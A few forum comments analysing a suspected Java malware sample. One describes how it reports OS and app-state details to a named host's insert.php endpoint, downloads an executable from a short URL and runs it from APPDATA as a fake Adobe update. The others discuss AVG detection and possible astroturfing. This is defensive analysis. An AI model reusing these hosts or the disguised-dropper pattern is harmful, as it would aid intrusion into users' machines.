Earlier quoted context omitted.
It sends log messages to http://www.galaxyjdb.com with your OS information and the state of the app.. /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE* It appears to download an exe from http://g2f.nl/0lczsoo Then it tries to execute the exe: System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe"; If at any point in the process it hits an exception, it sends the code for that exception to the galax…
AVG detects this as Luhe.Fiha.A Here's a mnetion from 2011: ( http://answers.microsoft.com/en-us/windows/forum/windows_7-s... ) So, someone using an OS heavily targeted by malware decides not to use anti-malware software, and to have javascript and apparently java enabled in the browser, and then chooses to visit an URL advertised in a chat window - that URL is unknown to that person, does not match the URL they're o…
But they also say, just because you're paranoid it doesn't mean they aren't after you.
So I'd say this may very well be the authors of the malware astroturfing and trying to fool others into ignoring it